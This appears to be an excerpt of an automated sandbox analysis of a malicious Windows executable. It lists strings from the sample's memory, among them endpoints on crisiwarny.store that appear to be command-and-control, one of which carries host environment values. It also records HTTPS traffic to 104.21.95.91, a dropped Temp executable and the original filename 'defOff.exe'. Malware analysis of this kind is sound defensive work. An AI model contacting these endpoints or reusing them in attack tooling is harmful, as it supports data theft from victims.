Source: file.exe, 00000000.00000003.2124561103.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253655039.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2109641062.0000000005E34000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2141585744.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253625013.00000000017C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142747663.00000000017FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2263039938.00000000017FD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142625341.00000000017F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/
Source: file.exe, 00000000.00000003.2155306590.00000000017FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/0
Source: file.exe, 00000000.00000003.2111053218.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2110280342.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2109706634.00000000017FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2109984852.00000000017FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/5e9f
Source: file.exe, 00000000.00000003.2141585744.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142747663.00000000017FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142625341.00000000017F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/Y
Source: file.exe, 00000000.00000003.2129448417.00000000017DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/a
Source: file.exe, 00000000.00000003.2124561103.00000000017FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/alt-
Source: file.exe, file.exe, 00000000.00000003.2141625871.00000000017ED000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253625013.00000000017C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2083678993.00000000017DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2141499215.00000000017EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/api
Source: file.exe, 00000000.00000003.2155306590.00000000017EB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253538805.00000000017E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253697863.00000000017ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/api3
Source: file.exe, 00000000.00000003.2124393205.0000000005E35000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2125805969.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2148529577.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2129029760.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2141448822.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2127812697.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2126194869.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2126017190.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2128672323.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2127070717.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2125616453.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2128020421.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2129262094.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2126680781.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2129756991.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253187496.0000000005E28000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155177011.0000000005E27000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2124702808.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2128238916.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2272666225.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2127372157.0000000005E39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/apiP-
Source: file.exe, 00000000.00000003.2155306590.00000000017EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/apiu
Source: file.exe, 00000000.00000003.2124561103.00000000017FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/r
Source: file.exe, 00000000.00000003.2111053218.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2110280342.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2109706634.00000000017FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2109984852.00000000017FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/t
Source: file.exe, 00000000.00000002.2262641819.00000000017CD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253625013.00000000017C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store:443/apiLE=user-PCUSERNAME=userUSERPROFILE=C:
Source: file.exe, 00000000.00000003.2084212152.0000000005DCC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084274235.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084373731.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2084212152.0000000005DCC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084274235.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084373731.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2084212152.0000000005DCC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084274235.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084373731.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000000.00000003.2111402565.0000000005E29000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: file.exe, 00000000.00000003.2111115009.00000000060BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: file.exe, 00000000.00000003.2111115009.00000000060BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: file.exe, 00000000.00000003.2084212152.0000000005DCC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084274235.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084373731.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.2084212152.0000000005DCC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084274235.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084373731.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: file.exe, 00000000.00000003.2111115009.00000000060BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: file.exe, 00000000.00000003.2111115009.00000000060BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000003.2111115009.00000000060BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000003.2111115009.00000000060BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.2111115009.00000000060BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000003.2111115009.00000000060BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49711 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: 02FQBW3AYVFKS8DMY3O.exe.0.dr	Static PE information: section name:
Source: 02FQBW3AYVFKS8DMY3O.exe.0.dr	Static PE information: section name: .idata

Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC109	0_3_017FC109
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Code function: 3_2_0056FD3E	3_2_0056FD3E

Source: file.exe	Binary or memory string: OriginalFilename vs file.exe
Source: file.exe, 00000000.00000003.2224954459.0000000006304000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2236216317.0000000006461000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2249678293.0000000006374000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
